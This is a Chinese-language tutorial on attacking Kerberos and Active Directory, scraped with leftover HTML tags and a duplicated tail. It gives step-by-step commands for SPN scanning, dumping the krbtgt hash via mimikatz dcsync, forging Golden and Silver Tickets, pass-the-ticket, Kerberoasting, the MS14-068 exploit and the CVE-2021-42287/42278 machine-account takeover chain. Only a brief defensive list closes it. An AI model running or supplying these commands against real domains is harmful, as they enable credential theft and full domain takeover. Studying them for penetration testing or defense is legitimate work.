Kerberos协议利用与经典漏洞利用总结<\/h1>

1. SPN(服务主体名称)基础<\/h2>

1.1 SPN定义<\/h3>

SPN是Kerberos客户端用于唯一标识特定Kerberos目标计算机的服务实例名称<\/li>
将服务实例与服务登录帐户相关联<\/li>

在整个林中的计算机上安装多个服务实例时，每个实例都必须有自己的SPN<\/li> <\/ul>

1.2 SPN格式<\/h3>

<service class>\/<host>:<port>\/<service name><\/code><\/p>


必须元素：服务类(如WWW、MySQL、MSSQL等)和主机名(FQDN或NetBIOS名)<\/li>
可选元素：端口号(默认端口可省略)和服务名称<\/li>
<\/ul>
1.3 SPN注册类型<\/h3>

注册在机器帐户(Computers)下：服务权限为Local System或Network Service时<\/li>
注册在域用户帐户(Users)下：服务权限为域用户时<\/li>
<\/ol>
1.4 常见SPN示例<\/h3>

MSSQLSvc\/adsmsSQLAP01.adssecurity.org:1433<\/li>
ExchangeMDB\/adsmsEXCAS01.adssecurity.org<\/li>
TERMSERV\/adsmsEXCAS01.adssecurity.org<\/li>
<\/ul>
2. SPN利用技术<\/h2>
2.1 SPN扫描<\/h3>
使用setspn.exe<\/strong>:<\/p>
setspn -T test -Q *\/*  # 查找test域中所有SPN信息
setspn -T test -Q *\/* | findstr "MSSQLSvc"  # 查找特定服务
<\/code><\/pre>
使用PowerView.ps1<\/strong>:<\/p>
import-module c:\powerview.ps1
<\/span><\/span>Get-NetComputer  # 获取域内所有机器信息<\/span>
<\/span><\/span>Get-NetUser  # 获取所有用户详细信息<\/span>
<\/span><\/span>Get-NetDomainController  # 获取域控制器信息<\/span>
<\/span><\/span><\/code><\/pre>2.2 机器用户与域用户关系<\/h3>

机器用户是computer类的实例，computer类是user类的子类<\/li>
机器用户具有域用户的所有属性<\/li>
以system权限运行时就是以机器用户登录域<\/li>
<\/ul>
提权为系统权限<\/strong>:<\/p>
psexec.exe -i -s powershell.exe "whoami"
<\/code><\/pre>
3. Kerberos协议基础<\/h2>
3.1 Kerberos认证流程<\/h3>

AS-REQ: 客户端向KDC发起验证请求(客户端Hash加密的时间戳)<\/li>
AS-REP: KDC返回使用krbtgt加密的TGT票据(包含PAC)<\/li>
TGS-REQ: 客户端使用TGT请求特定服务<\/li>
TGS-REP: KDC返回使用服务hash加密的TGS票据<\/li>
AP-REQ: 客户端使用TGS请求服务<\/li>
AP-REP: 服务验证TGS并检查PAC权限<\/li>
<\/ol>
3.2 PAC(特权属性证书)<\/h3>

包含用户的SID和所在组<\/li>
用于解决客户机访问权限问题<\/li>
只有KDC能制作和查看PAC<\/li>
<\/ul>
4. Kerberos攻击技术<\/h2>
4.1 黄金票据(Golden Ticket)<\/h3>
利用前提<\/strong>:<\/p>

域的SID<\/li>
域名<\/li>
krbtgt用户的NTLM hash或AES256密钥<\/li>
<\/ul>
特点<\/strong>:<\/p>

可绕过账户验证(20分钟内)<\/li>
可设置任意有效期<\/li>
即使KRBTGT密码更改一次仍有效<\/li>
绕过SmartCard验证<\/li>
可在非域主机上使用<\/li>
<\/ol>
利用步骤<\/strong>:<\/p>

获取krbtgt hash:<\/li>
<\/ol>
lsadump::dcsync \/domain:test.com \/user:krbtgt
<\/code><\/pre>

生成黄金票据:<\/li>
<\/ol>
kerberos::golden \/domain:test.com \/sid:S-1-5-21-4155807533-921486164-2767329826 \/aes256:af71a24ea463446f9b4c645e1bfe1e0f1c70c7d785df10acf008106a055e682f \/user:god \/ticket:gold.kirbi
<\/code><\/pre>

注入票据:<\/li>
<\/ol>
kerberos::ptt c:\test\gold.kirbi
<\/code><\/pre>
4.2 白银票据(Silver Ticket)<\/h3>
与黄金票据区别<\/strong>:<\/p>

伪造的是TGS票据而非TGT<\/li>
只能访问特定服务<\/li>
<\/ul>
利用方法<\/strong>:<\/p>
kerberos::golden \/domain:test.com \/sid:S-1-5-21-652679085-3170934373-4212321231 \/target:WIN2008.com \/service:cifs \/rc4:7c64e7ebf46b9515c56b2dd522d21c1c \/user:administrator \/ptt
<\/code><\/pre>
4.3 Kerberoast攻击<\/h3>
原理<\/strong>:<\/p>

利用TGS-REP中使用服务实例NTLM hash加密的TGS票据<\/li>
通过离线爆破获取服务账户密码<\/li>
<\/ul>
利用步骤<\/strong>:<\/p>

请求TGS:<\/li>
<\/ol>
Add-Type -AssemblyName System.IdentityModel
<\/span><\/span>New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc\/dc.test.com"<\/span>
<\/span><\/span><\/code><\/pre>
导出TGS:<\/li>
<\/ol>
kerberos::list \/export
<\/code><\/pre>

离线爆破:

使用tgsrepcrack.py或kirbi2john.py工具<\/li>
<\/ol>
5. 经典漏洞利用<\/h2>
5.1 MS14-068漏洞<\/h3>
利用前提<\/strong>:<\/p>

域普通用户的SID、用户名、密码<\/li>
域控未打KB3011780补丁<\/li>
<\/ul>
利用方法<\/strong>:<\/p>
MS14-068.exe -u 域用户@test.com -p 域用户密码 -s 域用户SID -d 域控ip
<\/code><\/pre>
5.2 CVE-2021-42287 + CVE-2021-42278<\/h3>
前置知识<\/strong>:<\/p>

S4U2self: 服务可代表用户申请针对自身的TGS<\/li>
机器账户默认以\(结尾，但漏洞允许创建不以\)<\/span>结尾的账户<\/li>
<\/ul>
利用步骤<\/strong>:<\/p>

添加机器账户:<\/li>
<\/ol>
New-MachineAccount -MachineAccount TestSPN -Domain xx.xx -DomainController xx.xx.xx
<\/span><\/span><\/code><\/pre>
清除SPN信息:<\/li>
<\/ol>
Set-DomainObject "CN=TestSPN,CN=Computers,DC=xxx,DC=xxx"<\/span> -Clear 'serviceprincipalname'<\/span>
<\/span><\/span><\/code><\/pre>
重命名机器账户为DC(不加$):<\/li>
<\/ol>
Set-MachineAccountAttribute -MachineAccount TestSPN -Value "DC"<\/span> -Attribute samaccountname
<\/span><\/span><\/code><\/pre>
请求TGT:<\/li>
<\/ol>
tgt::ask \/user:sql \/domain:warsec.com \/password:123admiN@
<\/code><\/pre>

恢复机器账户名:<\/li>
<\/ol>
Set-MachineAccountAttribute -MachineAccount TestSPN -Value "TestSPN"<\/span> -Attribute samaccountname
<\/span><\/span><\/code><\/pre>
请求S4U2self:<\/li>
<\/ol>
tgs::s4u \/tgt:TGT_sql@WARSEC.COM_krbtgt~warsec.com@WARSEC.COM.kirbi \/user:administrator \/service:cifs\/dc.warsec.com
<\/code><\/pre>

获取krbtgt hash:<\/li>
<\/ol>
kerberos::ptt tgs.kirbi
lsadump::dcsync \/user:x\krbtgt \/domain:x.x \/dc:x.x.x
<\/code><\/pre>
6. 防御建议<\/h2>

定期更改krbtgt账户密码<\/li>
限制机器账户创建权限(ms-ds-machineaccountquota)<\/li>
及时安装安全补丁<\/li>
监控异常Kerberos活动<\/li>
实施最小权限原则<\/li>
<\/ol>

Kerberos协议利用与经典漏洞利用总结<\/h1>

1. SPN(服务主体名称)基础<\/h2>

2. SPN利用技术<\/h2>

3. Kerberos协议基础<\/h2>

4. Kerberos攻击技术<\/h2>

5. 经典漏洞利用<\/h2>

6. 防御建议<\/h2> 定期更改krbtgt账户密码<\/li> 限制机器账户创建权限(ms-ds-machineaccountquota)<\/li> 及时安装安全补丁<\/li> 监控异常Kerberos活动<\/li> 实施最小权限原则<\/li> <\/ol>

6. 防御建议<\/h2>

定期更改krbtgt账户密码<\/li>
限制机器账户创建权限(ms-ds-machineaccountquota)<\/li>
及时安装安全补丁<\/li>
监控异常Kerberos活动<\/li>
实施最小权限原则<\/li> <\/ol>